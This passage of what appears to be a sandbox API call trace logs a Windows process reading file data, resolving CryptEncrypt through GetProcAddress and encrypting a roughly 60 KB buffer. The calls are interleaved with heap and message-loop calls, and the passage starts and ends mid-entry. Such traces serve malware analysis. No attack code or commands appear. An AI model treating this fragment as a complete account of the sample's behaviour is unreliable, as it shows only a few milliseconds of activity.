lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xe9fe, lpOverlapped=0x0) returned 1 [0240.992] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0240.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe9fe) returned 0x2f14818 [0240.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0240.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0240.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe9fe) returned 0x2f23220 [0240.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe9fe) returned 0x2f14818 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0240.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0240.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0240.995] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0240.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0240.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe9fe) returned 0x2f14818 [0240.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55098 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe9fe) returned 0x2f31c28 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0240.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0240.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.000] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.000] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0241.000] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.000] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0241.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.001] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.001] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.001] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.001] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.001] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.001] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0241.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0241.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0241.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51430 [0241.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.005] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f350 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0241.006] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe9fe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xea00) returned 1 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0241.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 